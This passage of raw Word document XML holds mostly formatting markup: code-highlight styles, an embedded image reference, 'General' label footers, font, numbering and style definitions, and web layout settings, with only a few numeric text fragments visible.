        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>146</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-text"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="000000"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rStyle w:val="enlighter-m3"/>
          <w:rFonts w:ascii="inherit" w:hAnsi="inherit"/>
          <w:color w:val="0086B3"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
        </w:rPr>
        <w:t>128</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1129C0C1" w14:textId="75F3EECC" w:rsidR="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="150" w:afterAutospacing="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:color w:val="4C4F53"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Muli" w:hAnsi="Muli"/>
          <w:noProof/>
          <w:color w:val="000000"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="38084CE6" wp14:editId="4C5BB9CE">
            <wp:extent cx="5731510" cy="7257415"/>
            <wp:effectExtent l="0" t="0" r="254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7257415"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FDE1A39" w14:textId="77777777" w:rsidR="00523D79" w:rsidRDefault="00523D79"/>
    <w:sectPr w:rsidR="00523D79">
      <w:footerReference w:type="even" r:id="rId63"/>
      <w:footerReference w:type="default" r:id="rId64"/>
      <w:footerReference w:type="first" r:id="rId6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E9E35D" w14:textId="77777777" w:rsidR="00DC15B0" w:rsidRDefault="00DC15B0" w:rsidP="00523D79">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:endnote>
  <w:endnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="2715ECA6" w14:textId="77777777" w:rsidR="00DC15B0" w:rsidRDefault="00DC15B0" w:rsidP="00523D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Josefin Sans">
    <w:charset w:val="00"/>
    <w:family w:val="auto"/>
    <w:pitch w:val="variable"/>
    <w:sig w:usb0="A00000FF" w:usb1="4000204B" w:usb2="00000000" w:usb3="00000000" w:csb0="00000193" w:csb1="00000000"/>
  </w:font>
  <w:font w:name="Muli">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Source Code Pro">
    <w:charset w:val="00"/>
    <w:family w:val="modern"/>
    <w:pitch w:val="fixed"/>
    <w:sig w:usb0="200002F7" w:usb1="020038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24CEF3" w14:textId="36E78D56" w:rsidR="00523D79" w:rsidRDefault="00523D79">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251659264" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="6C25E512" wp14:editId="0C02A46E">
              <wp:simplePos x="635" y="635"/>
              <wp:positionH relativeFrom="page">
                <wp:align>center</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:align>bottom</wp:align>
              </wp:positionV>
              <wp:extent cx="443865" cy="443865"/>
              <wp:effectExtent l="0" t="0" r="4445" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="2" name="Text Box 2" descr="Gener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DD233D9" w14:textId="041C19FA" w:rsidR="00523D79" w:rsidRPr="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
                          <w:pPr>
                            <w:spacing w:after="0"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:noProof/>
                              <w:color w:val="626469"/>
                              <w:sz w:val="12"/>
                              <w:szCs w:val="12"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00523D79">
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:noProof/>
                              <w:color w:val="626469"/>
                              <w:sz w:val="12"/>
                              <w:szCs w:val="12"/>
                            </w:rPr>
                            <w:t>General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6C25E512" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Text Box 2" o:spid="_x0000_s1026" type="#_x0000_t202" alt="General" style="position:absolute;margin-left:0;margin-top:0;width:34.95pt;height:34.95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" filled="f" stroked="f">
              <v:fill o:detectmouseclick="t"/>
              <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,15pt">
                <w:txbxContent>
                  <w:p w14:paraId="7DD233D9" w14:textId="041C19FA" w:rsidR="00523D79" w:rsidRPr="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
                    <w:pPr>
                      <w:spacing w:after="0"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:noProof/>
                        <w:color w:val="626469"/>
                        <w:sz w:val="12"/>
                        <w:szCs w:val="12"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="00523D79">
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:noProof/>
                        <w:color w:val="626469"/>
                        <w:sz w:val="12"/>
                        <w:szCs w:val="12"/>
                      </w:rPr>
                      <w:t>General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D1BA9" w14:textId="083A0175" w:rsidR="00523D79" w:rsidRDefault="00523D79">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251660288" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="3456905D" wp14:editId="4374A8ED">
              <wp:simplePos x="914400" y="10073640"/>
              <wp:positionH relativeFrom="page">
                <wp:align>center</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:align>bottom</wp:align>
              </wp:positionV>
              <wp:extent cx="443865" cy="443865"/>
              <wp:effectExtent l="0" t="0" r="4445" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="3" name="Text Box 3" descr="Gener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2FB4955" w14:textId="5D3930EC" w:rsidR="00523D79" w:rsidRPr="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
                          <w:pPr>
                            <w:spacing w:after="0"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:noProof/>
                              <w:color w:val="626469"/>
                              <w:sz w:val="12"/>
                              <w:szCs w:val="12"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00523D79">
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:noProof/>
                              <w:color w:val="626469"/>
                              <w:sz w:val="12"/>
                              <w:szCs w:val="12"/>
                            </w:rPr>
                            <w:t>General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3456905D" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Text Box 3" o:spid="_x0000_s1027" type="#_x0000_t202" alt="General"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fill o:detectmouseclick="t"/>
              <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,15pt">
                <w:txbxContent>
                  <w:p w14:paraId="62FB4955" w14:textId="5D3930EC" w:rsidR="00523D79" w:rsidRPr="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
                    <w:pPr>
                      <w:spacing w:after="0"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:noProof/>
                        <w:color w:val="626469"/>
                        <w:sz w:val="12"/>
                        <w:szCs w:val="12"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="00523D79">
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:noProof/>
                        <w:color w:val="626469"/>
                        <w:sz w:val="12"/>
                        <w:szCs w:val="12"/>
                      </w:rPr>
                      <w:t>General</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C31F8" w14:textId="6C2C7D9A" w:rsidR="00523D79" w:rsidRDefault="00523D79">
    <w:pPr>
      <w:pStyle w:val="Footer"/>
    </w:pPr>
    <w:r>
      <w:rPr>
        <w:noProof/>
      </w:rPr>
      <mc:AlternateContent>
        <mc:Choice Requires="wps">
          <w:drawing>
            <wp:anchor distT="0" distB="0" distL="0" distR="0" simplePos="0" relativeHeight="251658240" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="01DB76EF" wp14:editId="50643685">
              <wp:simplePos x="635" y="635"/>
              <wp:positionH relativeFrom="page">
                <wp:align>center</wp:align>
              </wp:positionH>
              <wp:positionV relativeFrom="page">
                <wp:align>bottom</wp:align>
              </wp:positionV>
              <wp:extent cx="443865" cy="443865"/>
              <wp:effectExtent l="0" t="0" r="4445" b="0"/>
              <wp:wrapNone/>
              <wp:docPr id="1" name="Text Box 1" descr="Gener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C2C26AE" w14:textId="14D4A89F" w:rsidR="00523D79" w:rsidRPr="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
                          <w:pPr>
                            <w:spacing w:after="0"/>
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:noProof/>
                              <w:color w:val="626469"/>
                              <w:sz w:val="12"/>
                              <w:szCs w:val="12"/>
                            </w:rPr>
                          </w:pPr>
                          <w:r w:rsidRPr="00523D79">
                            <w:rPr>
                              <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                              <w:noProof/>
                              <w:color w:val="626469"/>
                              <w:sz w:val="12"/>
                              <w:szCs w:val="12"/>
                            </w:rPr>
                            <w:t>General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01DB76EF" id="_x0000_t202" coordsize="21600,21600" o:spt="202" path="m,l,21600r21600,l21600,xe">
              <v:stroke joinstyle="miter"/>
              <v:path gradientshapeok="t" o:connecttype="rect"/>
            </v:shapetype>
            <v:shape id="Text Box 1" o:spid="_x0000_s1028" type="#_x0000_t202" alt="General" style="position:absolute;margin-left:0;margin-top:0;width:34.95pt;height:34.95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fill o:detectmouseclick="t"/>
              <v:textbox style="mso-fit-shape-to-text:t" inset="0,0,0,15pt">
                <w:txbxContent>
                  <w:p w14:paraId="0C2C26AE" w14:textId="14D4A89F" w:rsidR="00523D79" w:rsidRPr="00523D79" w:rsidRDefault="00523D79" w:rsidP="00523D79">
                    <w:pPr>
                      <w:spacing w:after="0"/>
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:noProof/>
                        <w:color w:val="626469"/>
                        <w:sz w:val="12"/>
                        <w:szCs w:val="12"/>
                      </w:rPr>
                    </w:pPr>
                    <w:r w:rsidRPr="00523D79">
                      <w:rPr>
                        <w:rFonts w:ascii="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri" w:cs="Calibri"/>
                        <w:noProof/>
                        <w:color w:val="626469"/>
                        <w:sz w:val="12"/>
                        <w:szCs w:val="12"/>
                      </w:rPr>
                      <w:t>General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064C19" w14:textId="77777777" w:rsidR="00DC15B0" w:rsidRDefault="00DC15B0" w:rsidP="00523D79">
      <w:pPr>
        <w:spacing w:after="0" w:line="240" w:lineRule="auto"/>
      </w:pPr>
      <w:r>
        <w:separator/>
      </w:r>
    </w:p>
  </w:footnote>
  <w:footnote w:type="continuationSeparator" w:id="0">
    <w:p w14:paraId="1903685C" w14:textId="77777777" w:rsidR="00DC15B0" w:rsidRDefault="00DC15B0" w:rsidP="00523D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402019"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="24DC5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AF36BC7"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="238E5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76C1D4D"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="7324A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6E9532F"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="D6566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7B14BD1"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="9F540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B7C4AC6"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="80C20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9CB29A2"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="B0901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05522394">
    <w:abstractNumId w:val="6"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="236326931">
    <w:abstractNumId w:val="3"/>
  </w:num>
  <w:num w:numId="3" w16cid:durableId="2102986752">
    <w:abstractNumId w:val="5"/>
  </w:num>
  <w:num w:numId="4" w16cid:durableId="633951821">
    <w:abstractNumId w:val="2"/>
  </w:num>
  <w:num w:numId="5" w16cid:durableId="72095029">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="6" w16cid:durableId="1101415248">
    <w:abstractNumId w:val="4"/>
  </w:num>
  <w:num w:numId="7" w16cid:durableId="13386553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1D79"/>
    <w:rsid w:val="000D2A41"/>
    <w:rsid w:val="00240D72"/>
    <w:rsid w:val="00523D79"/>
    <w:rsid w:val="00835E55"/>
    <w:rsid w:val="00845DCA"/>
    <w:rsid w:val="00B55EC5"/>
    <w:rsid w:val="00D71D79"/>
    <w:rsid w:val="00DC15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4134B5"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{377F2DD6-2571-43FE-A21A-DAF2FDCFE7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23D7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3">
    <w:name w:val="heading 3"/>
    <w:basedOn w:val="Normal"/>
    <w:next w:val="Normal"/>
    <w:link w:val="Heading3Char"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:qFormat/>
    <w:rsid w:val="00523D7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523D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3D79"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading1Char">
    <w:name w:val="Heading 1 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading1"/>
    <w:uiPriority w:val="9"/>
    <w:rsid w:val="00523D79"/>
    <w:rPr>
      <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
      <w:b/>
      <w:bCs/>
      <w:kern w:val="36"/>
      <w:sz w:val="48"/>
      <w:szCs w:val="48"/>
      <w:lang w:eastAsia="en-IN"/>
      <w14:ligatures w14:val="none"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="Heading3Char">
    <w:name w:val="Heading 3 Char"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:link w:val="Heading3"/>
    <w:uiPriority w:val="9"/>
    <w:semiHidden/>
    <w:rsid w:val="00523D79"/>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523D7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523D79"/>
    <w:rPr>
      <w:b/>
      <w:bCs/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:styleId="Hyperlink">
    <w:name w:val="Hyperlink"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:uiPriority w:val="99"/>
    <w:semiHidden/>
    <w:unhideWhenUsed/>
    <w:rsid w:val="00523D79"/>
    <w:rPr>
      <w:color w:val="0000FF"/>
      <w:u w:val="single"/>
    </w:rPr>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="enlighter-text">
    <w:name w:val="enlighter-text"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00523D79"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="enlighter-n0">
    <w:name w:val="enlighter-n0"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00523D79"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="enlighter-m3">
    <w:name w:val="enlighter-m3"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00523D79"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="enlighter-n1">
    <w:name w:val="enlighter-n1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00523D79"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="enlighter-g1">
    <w:name w:val="enlighter-g1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00523D79"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="enlighter-s0">
    <w:name w:val="enlighter-s0"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00523D79"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="enlighter-k1">
    <w:name w:val="enlighter-k1"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00523D79"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="enlighter-g0">
    <w:name w:val="enlighter-g0"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00523D79"/>
  </w:style>
  <w:style w:type="character" w:customStyle="1" w:styleId="enlighter-c0">
    <w:name w:val="enlighter-c0"/>
    <w:basedOn w:val="DefaultParagraphFont"/>
    <w:rsid w:val="00523D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286064">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
      <w:divsChild>
        <w:div w:id="1161504313">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1060904620">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="767239759">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1891186490">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1119757718">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                      </w:divsChild>
                    </w:div>
                    <w:div w:id="51315576">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="109956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7967521">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="2072340613">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1155952898">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="1125661582">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="211073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4831967">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="361974657">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
                <w:div w:id="1394700156">
                  <w:marLeft w:val="0"/>
                  <w:marRight w:val="0"/>
                  <w:marTop w:val="0"/>
                  <w:marBottom w:val="0"/>
                  <w:divBdr>
                    <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                    <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                  </w:divBdr>
                  <w:divsChild>
                    <w:div w:id="612052885">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="1737894429">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                      </w:divsChild>
                    </w:div>
                    <w:div w:id="1551647828">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="161042627">
                          <w:marLeft w:val="0"/>
                          <w:marRight w:val="0"/>
                          <w:marTop w:val="0"/>
                          <w:marBottom w:val="0"/>
                          <w:divBdr>
                            <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                            <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                          </w:divBdr>
                        </w:div>
                      </w:divsChild>
                    </w:div>
                    <w:div w:id="671419325">
                      <w:marLeft w:val="0"/>
                      <w:marRight w:val="0"/>
                      <w:marTop w:val="0"/>
                      <w:marBottom w:val="0"/>
                      <w:divBdr>
                        <w:top w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:left w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:bottom w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                        <w:right w:val="single" w:sz="2" w:space="0" w:color="FFFFFF"/>
                      </w:divBdr>
                      <w:divsChild>
                        <w:div w:id="172971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0439788">
          <w:marLeft w:val="0"/>
          <w:marRight w:val="0"/>
          <w:marTop w:val="0"/>
          <w:marBottom w:val="300"/>
          <w:divBdr>
            <w:top w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:left w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:bottom w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
            <w:right w:val="single" w:sz="6" w:space="0" w:color="E0E0E0"/>
          </w:divBdr>
          <w:divsChild>
            <w:div w:id="1365516725">
              <w:marLeft w:val="0"/>
              <w:marRight w:val="0"/>
              <w:marTop w:val="0"/>
              <w:marBottom w:val="0"/>
              <w:divBdr>
                <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
                <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
              </w:divBdr>
              <w:divsChild>
